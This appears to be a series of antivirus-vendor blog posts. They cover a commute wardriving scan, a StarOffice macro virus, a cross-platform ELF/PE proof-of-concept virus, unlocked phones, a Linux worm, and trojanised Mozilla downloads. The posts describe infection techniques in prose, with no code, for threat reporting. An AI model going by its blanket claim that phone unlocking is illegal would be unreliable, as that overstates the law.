16 Jan Just for fun
30 May Stardust - a macro curiosity
22 Dec New worm for Linux
Join our blog
You can contribute to our blog if you have +100 points. Comment on articles and blogposts, and other users will rate your comments. You receive points for positive ratings.
I decided to introduce a bit of variety into my daily commute today by scanning the Wifi networks on the way to the office.
I used my Sony pcg-fxa53 laptop with a senao NL-2311CD Plus Ext2 pcmcia wifi card, an external antenna, and a garmin legend gps navigator. As for software, I used Linux SuSE OSS 10, kismet, gpsd, gpsmap and google api.
Once I'd thrown all that together (and of course I could write an article on that) I set off for work.
I live pretty close to the office, and my commute only takes about ten minutes - even in that time I was able to collect a fair bit of data which is shown in the picture below.
Overall, I detected 40 Wifi networks: the totally unprotected networks are marked with a red dot, those with WEP enabled are marked with a yellow dot, and those with WPA are marked with a green dot.
Just another little bit of data to add to our continuing research on wifi networks and encryption around the world.
I came across something interesting today: a macro virus which we’ve named Virus.StarOffice.Stardust.a
You might wonder what's interesting about this - viruses have been around for a long time, and are starting to fade from the scene.
But if you look more closely at the name, you can see why I'm interested: Stardust is a macro virus written for StarOffice, the first one I’ve seen. Macro viruses usually infect MS Office applications.
Stardust is the first virus I know of which is theoretically capable of infecting StarOffice and/ or OpenOffice. It's written in Star Basic. It downloads an image file (with adult content) from the Internet and then opens this file in a new document.
We’ll have a description of it in the Virus Encyclopaedia soon.
We’ve received a new sample: another cross platform virus. This sample is the latest attempt to create malicious code which will infect both Linux and Win32 systems. It’s therefore been given a double name: Virus.Linux.Bi.a/ Virus.Win32.Bi.a
The virus is written in assembler and is relatively simple: it only infects files in the current directory. However, it is interesting in that it is capable of infecting the different file formats used by Linux and Windows - ELF and PE format files respectively.
To infect ELF files, the virus uses INT 80 system calls and injects its body into the file immediately after the ELF file header and before the “.text” section. This changes the entry point of the original file.
Infected files are identified with a 2-byte signature, 7DFBh, at 0Bh.
The virus uses the Kernel32.dll function to infect systems running Win32. It injects its code to the final section, and gains control by again changing the entry point. Infected PE files contain the same 2-byte signature as ELF files; the signature is placed in the PE TimeDateStamp header.
Infected files contain the following text strings:
This is Sepultura signing off...
This is The Soul Manager saying goodbye...
Greetz to: Immortal Riot, #RuxCon!
The infector itself contains the following strings:
[CAPZLOQ TEKNIQ 1.0] VIRUS SUCCESFULLY EXECUTED!
The virus doesn’t have any practical application - it’s classic Proof of Concept code, written to show that it is possible to create a cross platform virus.
However, our experience shows that once proof of concept code is released, virus writers are usually quick to take the code, and adapt it for their own use.
Detection for Virus.Linux.Bi.a/ Virus.Win32.Bi.a was added to the Kaspersky Anti-Virus databases shortly after the sample was received.
In the majority of European countries it's possible to buy a mobile phone for very little money. In effect, the cost of the handset is subsidized by the service provider. However, in many cases, the phone will only work on a specified network.
If the user wants to put in a new SIM card, and change service providers, the handset has to be unlocked. This is done by changing the firmware on the phone.
As a rule, these phones are only sold on the grey market. Some sources estimate that between 15 - 18% of users have such phones. This causes an estimated 1.5 million euros loss to the mobile telecoms market.
Unlocking handsets is illegal, and causes a whole range of security problems.
A lot of modern handsets run Symbian OS, and are therefore vulnerable to attack from mobile malware. There are a number of known cases where 'unlocked' phones have been infected with Cabir or with other malware.
The firmware itself can pose another threat. The firmware on grey market handsets that have been unlocked may contain code which can be used by unsanctioned services, and could potentially add several hundred euros to the user's phone bill.
The Italian mass media has recently reported a number of such cases, and an investigation is currently being conducted.
This morning a new worm for Linux appeared on the Internet. This is the second worm in the last couple of months. (The one before this one, Lupper, appeared on 7th November 2005). This shows how relatively rare Linux worms are in comparison to Windows worms.
We've called the new worm Net-Worm.Linux.Mare.a, and it uses php include to propagate. A modification of Backdoor.Linux.Tsunami spreads together with the worm.
Infected binary or source code files aren't anything new. And sometimes they are found on public servers. Mozilla.org is the latest example.
Korean distributives for mozilla and thunderbird for linux turned out to be infected - mozilla-installer-bin from mozilla-1.7.6.ko-KR.linux-i686.installer.tar.gz and mozilla-xremote-client from thunderbird-1.0.2.tar.gz were infected with Virus.Linux.RST.b
This virus searches for executable ELF files in the current and /bin directories and infects them. When infecting files, it writes itself to the middle of the file, at the end of a section of code, which pushes the other sections lower down. It also contains a backdoor, which downloads scripts from another site, and executes them, using a standard shell.
The infected files have now been removed, but it took some time. And this isn't the first time that infected binary or source code files have been placed on public servers. Yet another example of why you should have an up to date antivirus solution, and scan EVERYTHING you download, without exception.